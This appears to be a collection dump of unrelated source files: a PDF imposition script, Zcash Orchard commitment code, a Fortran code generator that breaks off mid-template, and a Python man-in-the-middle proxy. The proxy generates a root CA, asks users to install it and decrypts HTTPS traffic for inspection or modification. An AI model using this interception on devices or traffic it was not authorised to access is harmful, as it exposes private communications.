import PyPDF2
from reportlab.lib.units import mm, inch
logging.basicConfig(format='%(asctime)s,%(msecs)d | %(levelname)-8s | %(filename)s:%(funcName)s:%(lineno)d - %(message)s',
datefmt='%Y-%m-%d:%H:%M:%S',
level=logging.DEBUG)
log = logging.getLogger(__name__)
pt2mm = 0.3527777778
class Imposition(BaseModel):
substrate_width: float
substrate_height: float
impose_width: Optional[float]
impose_height: Optional[float]
gutter: Optional[int] = 5
pages: Optional[int] = 2
up: Optional[int]
orientation: Optional[str] = "landscape"
amount_x: Optional[int]
amount_y: Optional[int]
def set_orientation(self):
sub_size = [self.substrate_height, self.substrate_width]
if self.orientation == "landscape":
# on landscape width should be larger then height
if not self.substrate_width < self.substrate_height:
sub_size[0] = self.substrate_width
sub_size[1] = self.substrate_height
else:
# if orientation == portrait
if self.substrate_height < self.substrate_width:
sub_size[0] = self.substrate_width
sub_size[1] = self.substrate_height
self.substrate_width = sub_size[0]
self.substrate_height = sub_size[1]
return
def upcalc(self, PDFw, PDFh):
# add gutter to pdf
pdf_gut_w = PDFw + self.gutter
pdf_gut_h = PDFh + self.gutter
# copied from our upcalc-api
subw = self.substrate_width
subh = self.substrate_height
# landscape imposition
landscape_w = math.floor(subw / pdf_gut_w)
landscape_h = math.floor(subh / pdf_gut_h)
landscape_up = math.floor(landscape_w * landscape_h)
# calculate the portrait impose
portrait_w = math.floor(subw / pdf_gut_h)
portrait_h = math.floor(subh / pdf_gut_w)
portrait_up = math.floor(portrait_w * portrait_h)
if landscape_up > portrait_up:
self.orientation = "landscape"
self.amount_x = landscape_w
self.amount_y = landscape_h
self.up = landscape_up
else:
self.orientation = "portrait"
self.amount_x = portrait_w
self.amount_y = portrait_h
self.up = portrait_up
# calc the impose w & height
self.impose_width = self.amount_x * pdf_gut_w
self.impose_height = self.amount_y * pdf_gut_h
# reset the orientation
self.set_orientation()
return
def impose(self, pdfobj):
pdf_writer = PyPDF2.PdfFileWriter()
row_height = (pdfobj.trim_height+self.gutter)*mm # 55mm
single_width = (pdfobj.trim_width+self.gutter)*mm # 85mm
with open("./outfile.pdf", "wb") as pdf_to_write:
for page in range(0, self.pages):
# get the current pdf page
cur_page = pdfobj.pdf_reader.getPage(page)
# make the imposition sheet
impsheet = PyPDF2.pdf.PageObject.createBlankPage(
None, self.impose_width*mm, self.impose_height*mm)
for y in range(0, self.amount_y):
cur_height = row_height*y
for x in range(0, self.amount_x):
impsheet.mergeTranslatedPage(
cur_page, single_width*x, cur_height)
pdf_writer.addPage(impsheet)
pdf_writer.write(pdf_to_write)
return
class PDF(BaseModel):
location: Path
trim_width: Optional[float]
trim_height: Optional[float]
pages: Optional[int] = 2
pdf_handle: Optional[Any]
pdf_reader: Optional[Any]
def __init__(self, **data: Any):
super().__init__(**data)
self.read_pdf()
return
def read_pdf(self):
self.pdf_handle = open(f"{self.location}", "rb")
self.pdf_reader = PyPDF2.PdfFileReader(self.pdf_handle)
self.pages = self.pdf_reader.getNumPages()
# note: this pulls only trimbox info from the first page
trim_width = self.pdf_reader.getPage(0).trimBox.getWidth()
trim_height = self.pdf_reader.getPage(0).trimBox.getHeight()
# cleanup the format
self.trim_width = round(float(trim_width) * pt2mm + 0.001, 2)
self.trim_height = round(float(trim_height) * pt2mm + 0.001, 2)
return
def __del__(self):
self.pdf_handle.close()
return
def main():
pdf = Path(sys.argv[1])
log.debug(f"given pdf: {pdf}")
pdfobj = PDF(location=pdf)
impdata = {
"substrate_width": 460,
"substrate_height": 320,
"pages": pdfobj.pages
}
imp = Imposition(**impdata)
imp.upcalc(PDFw=pdfobj.trim_width, PDFh=pdfobj.trim_height)
imp.impose(pdfobj)
del(pdfobj)
pass
if __name__ == "__main__":
main()
pass
| 3,861
| 787
| 69
|
c4760810a6b30136c57c8727033cf01063f4f5da
| 2,439
|
py
|
Python
|
zcash_test_vectors/orchard/commitments.py
|
jarys/zcash-test-vectors
|
0cbb8200b092867606835d641cf65c606d987fd7
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
zcash_test_vectors/orchard/commitments.py
|
jarys/zcash-test-vectors
|
0cbb8200b092867606835d641cf65c606d987fd7
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
zcash_test_vectors/orchard/commitments.py
|
jarys/zcash-test-vectors
|
0cbb8200b092867606835d641cf65c606d987fd7
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys; assert sys.version_info[0] >= 3, "Python 3 required."
from .group_hash import group_hash
from .pallas import Fp, Scalar
from .sinsemilla import sinsemilla_hash_to_point
from ..utils import i2lebsp
# Commitment schemes used in Orchard https://zips.z.cash/protocol/nu5.pdf#concretecommit
# https://zips.z.cash/protocol/nu5.pdf#constants
L_ORCHARD_BASE = 255
# https://zips.z.cash/protocol/nu5.pdf#concretehomomorphiccommit
# https://zips.z.cash/protocol/nu5.pdf#concretesinsemillacommit
# https://zips.z.cash/protocol/nu5.pdf#concreteorchardnotecommit
# https://zips.z.cash/protocol/nu5.pdf#concreteorchardnotecommit
# Test consistency of ValueCommit^{Orchard} with precomputed generators
if __name__ == '__main__':
test_value_commit()
| 31.675325
| 107
| 0.707257
|
#!/usr/bin/env python3
import sys; assert sys.version_info[0] >= 3, "Python 3 required."
from .group_hash import group_hash
from .pallas import Fp, Scalar
from .sinsemilla import sinsemilla_hash_to_point
from ..utils import i2lebsp
# Commitment schemes used in Orchard https://zips.z.cash/protocol/nu5.pdf#concretecommit
# https://zips.z.cash/protocol/nu5.pdf#constants
L_ORCHARD_BASE = 255
# https://zips.z.cash/protocol/nu5.pdf#concretehomomorphiccommit
def homomorphic_pedersen_commitment(rcv: Scalar, D, v: Scalar):
    """Homomorphic Pedersen commitment to v with trapdoor rcv over domain D.

    https://zips.z.cash/protocol/nu5.pdf#concretehomomorphiccommit
    """
    value_base = group_hash(D, b"v")
    randomness_base = group_hash(D, b"r")
    return value_base * v + randomness_base * rcv
def value_commit(rcv: Scalar, v: Scalar):
    """ValueCommit^Orchard: Pedersen commitment to a note value v."""
    domain = b"z.cash:Orchard-cv"
    return homomorphic_pedersen_commitment(rcv, domain, v)
def rcv_trapdoor(rand):
    """Sample a fresh value-commitment trapdoor rcv from the randomness source."""
    return Scalar.random(rand)
# https://zips.z.cash/protocol/nu5.pdf#concretesinsemillacommit
def sinsemilla_commit(r: Scalar, D, M):
    """SinsemillaCommit: hash-to-point of message M blinded by trapdoor r.

    https://zips.z.cash/protocol/nu5.pdf#concretesinsemillacommit
    """
    assert isinstance(r, Scalar)
    message_point = sinsemilla_hash_to_point(D + b"-M", M)
    blinding_point = group_hash(D + b"-r", b"") * r
    return message_point + blinding_point
def sinsemilla_short_commit(r: Scalar, D, M):
    """SinsemillaShortCommit: x-coordinate extraction of SinsemillaCommit."""
    return sinsemilla_commit(r, D, M).extract()
# https://zips.z.cash/protocol/nu5.pdf#concreteorchardnotecommit
def note_commit(rcm, g_d, pk_d, v, rho, psi):
    """NoteCommit^Orchard over (g_d, pk_d, v, rho, psi) with trapdoor rcm.

    https://zips.z.cash/protocol/nu5.pdf#concreteorchardnotecommit
    """
    message = (
        g_d
        + pk_d
        + i2lebsp(64, v)
        + i2lebsp(L_ORCHARD_BASE, rho.s)
        + i2lebsp(L_ORCHARD_BASE, psi.s)
    )
    return sinsemilla_commit(rcm, b"z.cash:Orchard-NoteCommit", message)
def rcm_trapdoor(rand):
    """Sample a fresh note-commitment trapdoor rcm from the randomness source."""
    return Scalar.random(rand)
# https://zips.z.cash/protocol/nu5.pdf#concreteorchardnotecommit
def commit_ivk(rivk: Scalar, ak: Fp, nk: Fp):
    """CommitIvk: short commitment to (ak, nk) with trapdoor rivk.

    https://zips.z.cash/protocol/nu5.pdf#concreteorchardnotecommit
    """
    message = i2lebsp(L_ORCHARD_BASE, ak.s) + i2lebsp(L_ORCHARD_BASE, nk.s)
    return sinsemilla_short_commit(rivk, b"z.cash:Orchard-CommitIvk", message)
def rivk_trapdoor(rand):
    """Sample a fresh CommitIvk trapdoor rivk from the randomness source."""
    return Scalar.random(rand)
# Test consistency of ValueCommit^{Orchard} with precomputed generators
def test_value_commit():
    """Check value_commit against the precomputed Orchard value-commitment bases."""
    from random import Random
    from ..rand import Rand
    from .generators import VALUE_COMMITMENT_RANDOMNESS_BASE, VALUE_COMMITMENT_VALUE_BASE
    rng = Random(0xabad533d)
    def randbytes(l):
        # Deterministic byte source backed by the seeded PRNG above.
        ret = []
        while len(ret) < l:
            ret.append(rng.randrange(0, 256))
        return bytes(ret)
    rand = Rand(randbytes)
    rcv = rcv_trapdoor(rand)
    v = Scalar(100000000)
    # ValueCommit(rcv, v) must equal R*rcv + V*v for the fixed generator points.
    assert value_commit(rcv, v) == VALUE_COMMITMENT_RANDOMNESS_BASE * rcv + VALUE_COMMITMENT_VALUE_BASE * v
if __name__ == '__main__':
test_value_commit()
| 1,432
| 0
| 225
|
f14389d4d441d9fa654bdded6abebd61ad14e193
| 18,618
|
py
|
Python
|
wechatarticles/proxy.py
|
hjyjh/wechat_articles_spider
|
38da6cde565f8d6e09a5822b25b0dcfb1a8cb239
|
[
"Apache-2.0"
] | 1,603
|
2018-03-05T03:01:28.000Z
|
2022-03-31T05:30:51.000Z
|
wechatarticles/proxy.py
|
hjyjh/wechat_articles_spider
|
38da6cde565f8d6e09a5822b25b0dcfb1a8cb239
|
[
"Apache-2.0"
] | 42
|
2018-03-09T03:06:57.000Z
|
2021-12-31T02:30:13.000Z
|
wechatarticles/proxy.py
|
hjyjh/wechat_articles_spider
|
38da6cde565f8d6e09a5822b25b0dcfb1a8cb239
|
[
"Apache-2.0"
] | 491
|
2018-03-05T03:22:31.000Z
|
2022-03-30T10:10:59.000Z
|
# coding:utf-8
import logging
import os
import select
import zlib
import chardet
import time
from http.client import HTTPResponse
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from urllib.parse import urlparse, ParseResult, urlunparse
from tempfile import gettempdir
from ssl import wrap_socket, SSLError
from socket import socket
from OpenSSL.crypto import (
load_certificate,
FILETYPE_PEM,
TYPE_RSA,
PKey,
X509,
X509Extension,
dump_privatekey,
dump_certificate,
load_privatekey,
X509Req,
)
"""
该文件并未项目核心功能,仅作辅助脚本使用
感谢baseproxy项目。原项目地址https://github.com/qiyeboy/BaseProxy,具体详细操作方法请见原项目,步骤简述如下
1. 设置代理,开启服务
2. 下载证书http://baseproxy.ca/,并安装至本机(受信任的根证书颁发机构)
3. 配置完成,每次使用之前开启系统代理即可
为方便使用,在代码上进行了一定的修改,大部分内容来源于,https://github.com/qiyeboy/BaseProxy/blob/master/baseproxy/proxy.py
1. 修改部分函数名,变量名,函数,尽量保持与mitmproxy一致
2. 由于项目主要目的是拦截,并非篡改,增加了对链接过滤功能。若链接不包含相关字符,则不做操作,直接返回。ProxyHandle中的`self.filter_url_lst`
二次引用,若有冒犯原作者之处,敬请指出,将删除该文件。
"""
__all__ = [
"CAAuth",
"ProxyHandle",
"ReqIntercept",
"RspIntercept",
"MitmProxy",
"AsyncMitmProxy",
"Request",
"Response",
]
logging.basicConfig(
level=logging.INFO,
format="[%(asctime)s] %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
class CAAuth(object):
"""
用于CA证书的生成以及代理证书的自签名
"""
@property
| 29
| 95
| 0.570738
|
# coding:utf-8
import logging
import os
import select
import zlib
import chardet
import time
from http.client import HTTPResponse
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from urllib.parse import urlparse, ParseResult, urlunparse
from tempfile import gettempdir
from ssl import wrap_socket, SSLError
from socket import socket
from OpenSSL.crypto import (
load_certificate,
FILETYPE_PEM,
TYPE_RSA,
PKey,
X509,
X509Extension,
dump_privatekey,
dump_certificate,
load_privatekey,
X509Req,
)
"""
该文件并未项目核心功能,仅作辅助脚本使用
感谢baseproxy项目。原项目地址https://github.com/qiyeboy/BaseProxy,具体详细操作方法请见原项目,步骤简述如下
1. 设置代理,开启服务
2. 下载证书http://baseproxy.ca/,并安装至本机(受信任的根证书颁发机构)
3. 配置完成,每次使用之前开启系统代理即可
为方便使用,在代码上进行了一定的修改,大部分内容来源于,https://github.com/qiyeboy/BaseProxy/blob/master/baseproxy/proxy.py
1. 修改部分函数名,变量名,函数,尽量保持与mitmproxy一致
2. 由于项目主要目的是拦截,并非篡改,增加了对链接过滤功能。若链接不包含相关字符,则不做操作,直接返回。ProxyHandle中的`self.filter_url_lst`
二次引用,若有冒犯原作者之处,敬请指出,将删除该文件。
"""
__all__ = [
"CAAuth",
"ProxyHandle",
"ReqIntercept",
"RspIntercept",
"MitmProxy",
"AsyncMitmProxy",
"Request",
"Response",
]
logging.basicConfig(
level=logging.INFO,
format="[%(asctime)s] %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
class HttpTransfer(object):
    """Shared base for Request/Response: start-line fields, headers and body."""
    # http.client "version" codes mapped to protocol version strings.
    version_dict = {9: "HTTP/0.9", 10: "HTTP/1.0", 11: "HTTP/1.1"}
    def __init__(self):
        self.hostname = None
        self.port = None
        self.url = "" # URL without the scheme prefix
        # request-line fields
        self.command = None
        self.path = None
        self.request_version = None
        # status-line fields
        self.response_version = None
        self.status = None
        self.reason = None
        self._headers = None
        self._body = b""
    def parse_headers(self, headers_str):
        """
        Parse a raw CRLF-separated header blob into a dict (currently unused).
        :param headers_str: raw header string
        :return: dict of lower-cased header name -> value
        """
        header_list = headers_str.rstrip("\r\n").split("\r\n")
        headers = {}
        for header in header_list:
            [key, value] = header.split(": ")
            headers[key.lower()] = value
        return headers
    def to_data(self):
        # Subclasses must serialize themselves back to raw bytes.
        raise NotImplementedError("function to_data need override")
    def set_headers(self, headers):
        # Store a copy of the headers with lower-cased keys.
        headers_tmp = {}
        for k, v in headers.items():
            headers_tmp[k.lower()] = v
        self._headers = headers_tmp
    def build_headers(self):
        """
        Serialize the stored headers back into a "k: v\\r\\n" string.
        :return: header string
        """
        header_str = ""
        for k, v in self._headers.items():
            header_str += k + ": " + v + "\r\n"
        return header_str
    def get_header(self, key):
        # Case-insensitive header lookup; None when absent.
        if isinstance(key, str):
            return self._headers.get(key.lower(), None)
        raise Exception("parameter should be str")
    @property
    def headers(self):
        """
        Return the header dict (lower-cased keys).
        :return: dict
        """
        return self._headers
    def set_header(self, key, value):
        """
        Set a single header (case-insensitive key).
        :param key: header name
        :param value: header value
        :return: None
        """
        if isinstance(key, str) and isinstance(value, str):
            self._headers[key.lower()] = value
            return
        raise Exception("parameter should be str")
    def get_body_data(self):
        """
        Return the body as bytes.
        :return: bytes
        """
        return self._body
    def set_body_data(self, body):
        # Replace the body and keep Content-length in sync with it.
        if isinstance(body, bytes):
            self._body = body
            self.set_header("Content-length", str(len(body)))
            return
        raise Exception("parameter should be bytes")
class Request(HttpTransfer):
    """Client HTTP request captured from a BaseHTTPRequestHandler instance."""
    def __init__(self, req):
        HttpTransfer.__init__(self)
        self.hostname = req.hostname
        self.port = req.port
        # request-line fields
        self.command = req.command
        self.path = req.path
        self.request_version = req.request_version
        self.url = req.hostname + req.path
        self.set_headers(req.headers)
        # Read the body only when the client declared a Content-Length.
        if self.get_header("Content-Length"):
            self.set_body_data(req.rfile.read(int(self.get_header("Content-Length"))))
    def to_data(self):
        """Serialize back to raw bytes: request line + headers + blank line + body."""
        # Build request
        req_data = "%s %s %s\r\n" % (self.command, self.path, self.request_version)
        # Add headers to the request
        req_data += "%s\r\n" % self.build_headers()
        req_data = req_data.encode("utf-8")
        req_data += self.get_body_data()
        return req_data
class Response(HttpTransfer):
def __init__(self, request, proxy_socket):
HttpTransfer.__init__(self)
self.request = request
h = HTTPResponse(proxy_socket)
h.begin()
##HTTPResponse会将所有chunk拼接到一起,因此会直接得到所有内容,所以不能有Transfer-Encoding
del h.msg["Transfer-Encoding"]
del h.msg["Content-Length"]
self.response_version = self.version_dict[h.version]
self.status = h.status
self.reason = h.reason
self.set_headers(h.msg)
body_data = self._decode_content_body(
h.read(), self.get_header("Content-Encoding")
)
self.set_body_data(body_data)
self._text() # 尝试将文本进行解码
h.close()
proxy_socket.close()
def _text(self):
body_data = self.get_body_data()
if self.get_header("Content-Type") and (
"text" or "javascript"
) in self.get_header("Content-Type"):
self.decoding = chardet.detect(body_data)["encoding"] # 探测当前的编码
if self.decoding:
try:
self._body_str = body_data.decode(self.decoding) # 请求体
except Exception as e:
self._body_str = body_data
self.decoding = None
else:
self._body_str = body_data
else:
self._body_str = body_data
self.decoding = None
def get_text(self, decoding=None):
if decoding:
return self.get_body_data().decode(decoding)
return self.get_body_data().decode()
def set_body_str(self, body_str, encoding=None):
if isinstance(body_str, str):
if encoding:
self.set_body_data(body_str.encode(encoding))
else:
self.set_body_data(
body_str.encode(self.decoding if self.decoding else "utf-8")
)
self._body_str = body_str
return
raise Exception("parameter should be str")
def _encode_content_body(self, text, encoding):
if encoding == "identity":
data = text
elif encoding in ("gzip", "x-gzip"):
gzip_compress = zlib.compressobj(9, zlib.DEFLATED, zlib.MAX_WBITS | 16)
data = gzip_compress.compress(text) + gzip_compress.flush()
elif encoding == "deflate":
data = zlib.compress(text)
else:
data = text
return data
def _decode_content_body(self, data, encoding):
if encoding == "identity": # 没有压缩
text = data
elif encoding in ("gzip", "x-gzip"): # gzip压缩
text = zlib.decompress(data, 16 + zlib.MAX_WBITS)
elif encoding == "deflate": # zip压缩
try:
text = zlib.decompress(data)
except zlib.error:
text = zlib.decompress(data, -zlib.MAX_WBITS)
else:
text = data
self.set_header("Content-Encoding", "identity") # 没有压缩
return text
def to_data(self):
res_data = "%s %s %s\r\n" % (self.response_version, self.status, self.reason)
res_data += "%s\r\n" % self.build_headers()
res_data = res_data.encode(self.decoding if self.decoding else "utf-8")
res_data += self.get_body_data()
return res_data
class CAAuth(object):
    """
    Generates the proxy's root CA certificate and uses it to self-sign
    per-host server certificates.
    """
    def __init__(self, ca_file="ca.pem", cert_file="ca.crt"):
        self.ca_file_path = ca_file
        self.cert_file_path = cert_file
        self._gen_ca() # generate the CA cert; it must be installed as a trusted root in the browser/OS
    def _gen_ca(self, again=False):
        # Generate key
        # If the certificate files already exist and regeneration is not forced, just load them
        if (
            os.path.exists(self.ca_file_path)
            and os.path.exists(self.cert_file_path)
            and not again
        ):
            self._read_ca(self.ca_file_path) # load existing certificate material
            return
        self.key = PKey()
        self.key.generate_key(TYPE_RSA, 2048)
        # Generate certificate
        self.cert = X509()
        self.cert.set_version(2)
        self.cert.set_serial_number(1)
        self.cert.get_subject().CN = "baseproxy"
        self.cert.gmtime_adj_notBefore(0)
        self.cert.gmtime_adj_notAfter(315360000) # ten years
        self.cert.set_issuer(self.cert.get_subject())
        self.cert.set_pubkey(self.key)
        self.cert.add_extensions(
            [
                X509Extension(b"basicConstraints", True, b"CA:TRUE, pathlen:0"),
                X509Extension(b"keyUsage", True, b"keyCertSign, cRLSign"),
                X509Extension(
                    b"subjectKeyIdentifier", False, b"hash", subject=self.cert
                ),
            ]
        )
        self.cert.sign(self.key, "sha256")
        with open(self.ca_file_path, "wb+") as f:
            f.write(dump_privatekey(FILETYPE_PEM, self.key))
            f.write(dump_certificate(FILETYPE_PEM, self.cert))
        with open(self.cert_file_path, "wb+") as f:
            f.write(dump_certificate(FILETYPE_PEM, self.cert))
    def _read_ca(self, file):
        # The .pem file holds both the private key and the certificate.
        self.cert = load_certificate(FILETYPE_PEM, open(file, "rb").read())
        self.key = load_privatekey(FILETYPE_PEM, open(file, "rb").read())
    def __getitem__(self, cn):
        # Per-domain server certificates are cached under the system temp directory.
        cache_dir = gettempdir()
        root_dir = os.path.join(cache_dir, "baseproxy")
        if not os.path.exists(root_dir):
            os.makedirs(root_dir)
        cnp = os.path.join(root_dir, "baseproxy_{}.pem".format(cn))
        if not os.path.exists(cnp):
            self._sign_ca(cn, cnp)
        return cnp
    def _sign_ca(self, cn, cnp):
        # Sign a per-host server certificate for common name `cn` with our CA, writing it to `cnp`
        # create certificate
        try:
            key = PKey()
            key.generate_key(TYPE_RSA, 2048)
            # Generate CSR
            req = X509Req()
            req.get_subject().CN = cn
            req.set_pubkey(key)
            req.sign(key, "sha256")
            # Sign CSR
            cert = X509()
            cert.set_version(2)
            cert.set_subject(req.get_subject())
            cert.set_serial_number(self.serial)
            cert.gmtime_adj_notBefore(0)
            cert.gmtime_adj_notAfter(31536000) # one year
            cert.set_issuer(self.cert.get_subject())
            ss = ("DNS:%s" % cn).encode(encoding="utf-8")
            cert.add_extensions([X509Extension(b"subjectAltName", False, ss)])
            cert.set_pubkey(req.get_pubkey())
            cert.sign(self.key, "sha256")
            with open(cnp, "wb+") as f:
                f.write(dump_privatekey(FILETYPE_PEM, key))
                f.write(dump_certificate(FILETYPE_PEM, cert))
        except Exception as e:
            raise Exception("generate CA fail:{}".format(str(e)))
    @property
    def serial(self):
        # Millisecond timestamp used as a unique-enough certificate serial number.
        return int("%d" % (time.time() * 1000))
class ProxyHandle(BaseHTTPRequestHandler):
def __init__(self, request, client_addr, server):
self.is_connected = False
self.hook_init()
BaseHTTPRequestHandler.__init__(self, request, client_addr, server)
def hook_init(self):
# 增加初始化的其他操作,如初始化filter_url_lst
self.filter_url_lst = []
def do_CONNECT(self):
"""
处理https连接请求
:return:
"""
self.is_connected = True # 用来标识是否之前经历过CONNECT
if self.server.https:
self.connect_intercept()
else:
self.connect_relay()
def do_GET(self):
"""
处理GET请求
:return:
"""
if self.path == "http://baseproxy.ca/":
self._send_ca()
return
if not self.is_connected:
# 如果不是https,需要连接http服务器
try:
self._proxy_to_dst()
except Exception as e:
self.send_error(500, "{} connect fail ".format(self.hostname))
return
# 这里就是代理发送请求,并接收响应信息
request = Request(self)
# 增加过滤模块
flag = False
for filter_x in self.filter_url_lst:
if filter_x in request.url:
flag = True
break
if flag:
request = self.mitm_request(request)
if request:
self._proxy_sock.sendall(request.to_data())
# 将响应信息返回给客户端
response = Response(request, self._proxy_sock)
if flag:
response = self.mitm_response(response)
if response:
self.request.sendall(response.to_data())
else:
self.send_error(404, "response is None")
else:
self.send_error(404, "request is None")
do_HEAD = do_GET
do_POST = do_GET
do_PUT = do_GET
do_DELETE = do_GET
do_OPTIONS = do_GET
def _proxy_to_ssldst(self):
"""
代理连接https目标服务器
:return:
"""
##确定一下目标的服务器的地址与端口
# 如果之前经历过connect
# CONNECT www.baidu.com:443 HTTP 1.1
self.hostname, self.port = self.path.split(":")
self._proxy_sock = socket()
self._proxy_sock.settimeout(10)
self._proxy_sock.connect((self.hostname, int(self.port)))
# 进行SSL包裹
self._proxy_sock = wrap_socket(self._proxy_sock)
def _proxy_to_dst(self):
# 代理连接http目标服务器
# http请求的self.path 类似http://www.baidu.com:80/index.html
u = urlparse(self.path)
if u.scheme != "http":
raise Exception("Unknown scheme %s" % repr(u.scheme))
self.hostname = u.hostname
self.port = u.port or 80
# 将path重新封装,比如http://www.baidu.com:80/index.html会变成 /index.html
self.path = urlunparse(
ParseResult(
scheme="",
netloc="",
params=u.params,
path=u.path or "/",
query=u.query,
fragment=u.fragment,
)
)
self._proxy_sock = socket()
self._proxy_sock.settimeout(10)
self._proxy_sock.connect((self.hostname, int(self.port)))
def connect_intercept(self):
"""
需要解析https报文,包装socket
:return:
"""
try:
# 首先建立和目标服务器的链接
self._proxy_to_ssldst()
# 建立成功后,proxy需要给client回复建立成功
self.send_response(200, "Connection established")
self.end_headers()
# 这个时候需要将客户端的socket包装成sslsocket,这个时候的self.path类似www.baidu.com:443,根据域名使用相应的证书
self.request = wrap_socket(
self.request,
server_side=True,
certfile=self.server.ca[self.path.split(":")[0]],
)
except SSLError:
self.send_error(500, "更新证书!")
return
except Exception as e:
self.send_error(500, str(e))
return
self.setup()
self.ssl_host = "https://%s" % self.path
try:
self.handle_one_request()
except Exception as e:
return
def connect_relay(self):
"""
对于https报文直接转发
"""
self.hostname, self.port = self.path.split(":")
try:
self._proxy_sock = socket()
self._proxy_sock.settimeout(10)
self._proxy_sock.connect((self.hostname, int(self.port)))
except Exception as e:
self.send_error(500)
return
self.send_response(200, "Connection Established")
self.end_headers()
inputs = [self.request, self._proxy_sock]
while True:
readable, writeable, errs = select.select(inputs, [], inputs, 10)
if errs:
break
for r in readable:
data = r.recv(8092)
if data:
if r is self.request:
self._proxy_sock.sendall(data)
elif r is self._proxy_sock:
self.request.sendall(data)
else:
break
self.request.close()
self._proxy_sock.close()
def _send_ca(self):
# 发送CA证书给用户进行安装并信任
cert_path = self.server.ca.cert_file_path
with open(cert_path, "rb") as f:
data = f.read()
self.send_response(200)
self.send_header("Content-Type", "application/x-x509-ca-cert")
self.send_header("Content-Length", len(data))
self.send_header("Connection", "close")
self.end_headers()
self.wfile.write(data)
def mitm_request(self, req):
for p in self.server.req_plugs:
req = p(self.server).deal_request(req)
return req
def mitm_response(self, rsp):
for p in self.server.rsp_plugs:
rsp = p(self.server).deal_response(rsp)
return rsp
class MitmProxy(ThreadingMixIn, HTTPServer):
    """Threaded man-in-the-middle HTTP(S) proxy server with intercept plugins."""
    def __init__(
        self,
        server_addr=("", 8080),
        RequestHandlerClass=ProxyHandle,
        bind_and_activate=True,
        https=True,
        ca_file="ca.pem",
        cert_file="ca.crt",
    ):
        HTTPServer.__init__(self, server_addr, RequestHandlerClass, bind_and_activate)
        logging.info(
            "HTTPServer is running at address( %s , %d )......"
            % (server_addr[0], server_addr[1])
        )
        self.req_plugs = [] ## request-intercept plugin classes
        self.rsp_plugs = [] ## response-intercept plugin classes
        # CA used to self-sign per-host certificates; https toggles interception vs relay.
        self.ca = CAAuth(ca_file=ca_file, cert_file=cert_file)
        self.https = https
    def register(self, intercept_plug):
        """Register an InterceptPlug subclass; it may intercept requests, responses or both."""
        if not issubclass(intercept_plug, InterceptPlug):
            raise Exception(
                "Expected type InterceptPlug got %s instead" % type(intercept_plug)
            )
        if issubclass(intercept_plug, ReqIntercept):
            self.req_plugs.append(intercept_plug)
        if issubclass(intercept_plug, RspIntercept):
            self.rsp_plugs.append(intercept_plug)
class AsyncMitmProxy(MitmProxy):
    """Alias of MitmProxy kept for API compatibility."""
    # NOTE(review): MitmProxy already mixes in ThreadingMixIn, so this subclass
    # adds nothing beyond the name -- confirm whether only this variant was
    # meant to be threaded.
    pass
class InterceptPlug(object):
    """Base class for intercept plugins; holds a reference to the proxy server."""
    def __init__(self, server):
        self.server = server
class ReqIntercept(InterceptPlug):
    """Base class for request-intercepting plugins.

    Subclasses override deal_request() and must return the (possibly
    modified) request; ProxyHandle.mitm_request chains these return values.
    """
    def deal_request(self, request):
        """Default: pass the request through unchanged.

        The original body was `pass`, i.e. it returned None; any subclass
        relying on the base implementation would have its request dropped
        (ProxyHandle then answers 404). Passing the request through is the
        safe, backward-compatible default.
        """
        return request
class RspIntercept(InterceptPlug):
    """Base class for response-intercepting plugins.

    Subclasses override deal_response() and must return the (possibly
    modified) response; ProxyHandle.mitm_response chains these return values.
    """
    def deal_response(self, response):
        """Default: pass the response through unchanged.

        The original body was `pass` (returned None), which made
        ProxyHandle answer 404 when the base implementation was reached;
        pass-through is the safe, backward-compatible default.
        """
        return response
| 11,273
| 6,084
| 740
|
4743e2afb0612962f02991b2d1548016f9ee41de
| 3,134
|
py
|
Python
|
gen_create.py
|
pdebuyl/f90h5md
|
538bda2eebd5474489d963e16175aecdb750ab4d
|
[
"BSD-3-Clause"
] | 1
|
2019-10-17T15:57:45.000Z
|
2019-10-17T15:57:45.000Z
|
gen_create.py
|
pdebuyl/f90h5md
|
538bda2eebd5474489d963e16175aecdb750ab4d
|
[
"BSD-3-Clause"
] | null | null | null |
gen_create.py
|
pdebuyl/f90h5md
|
538bda2eebd5474489d963e16175aecdb750ab4d
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2011-2013 Pierre de Buyl
#
# This file is part of f90h5md
#
# f90h5md is free software and is licensed under the modified BSD license (see
# LICENSE file).
types = dict()
types['i'] = 'integer'
types['d'] = 'double precision'
H5T = dict()
H5T['i'] = 'H5T_NATIVE_INTEGER'
H5T['d'] = 'H5T_NATIVE_DOUBLE'
dims = dict()
dims['s'] = ''
dims['1'] = '(:)'
dims['2'] = '(:,:)'
dims['3'] = '(:,:,:)'
dims['4'] = '(:,:,:,:)'
for t_k,t_v in types.iteritems():
for d_k,d_v in dims.iteritems():
if (d_k == 's'):
rank = 1
else:
rank = int(d_k)+1
s=''
s+=""" !> Sets up a h5md_t variable.
!! @param file_id ID of the file.
!! @param name Name of the observable
!! @param ID Resulting h5md_t variable
!! @param data The data that will fit into the observable.
!! @param link_from Indicates if the step and time for this observable should be linked from another one.
!! @param override_obs Indicates if the data should be stored outside of /observables.
!! @private"""
s+="""
subroutine h5md_create_obs_%s%s(file_id, name, ID, data, link_from, override_obs)
integer(HID_T), intent(inout) :: file_id
character(len=*), intent(in) :: name
type(h5md_t), intent(out) :: ID
%s, intent(in) :: data%s
character(len=*), intent(in), optional :: link_from
character(len=*), intent(in), optional :: override_obs
integer(HID_T) :: file_s, plist, g_id
integer(HSIZE_T), allocatable :: dims(:), max_dims(:), chunk_dims(:)
integer :: rank
character(len=64) :: g_name
if (present(override_obs)) then
g_name = override_obs
else
g_name = 'observables'
end if
call h5gcreate_f(file_id, trim(g_name)//'/'//name, g_id, h5_error)
rank = %i
allocate(dims(rank)) ; allocate(max_dims(rank)) ; allocate(chunk_dims(rank))
""" % (t_k,d_k, t_v, d_v, rank )
if (d_k!='s'):
s+="""
dims(1:%i) = shape(data)
max_dims(1:%i) = shape(data)
chunk_dims(1:%i) = shape(data)
""" % (rank-1, rank-1, rank-1)
s+="""
dims(%i) = 0
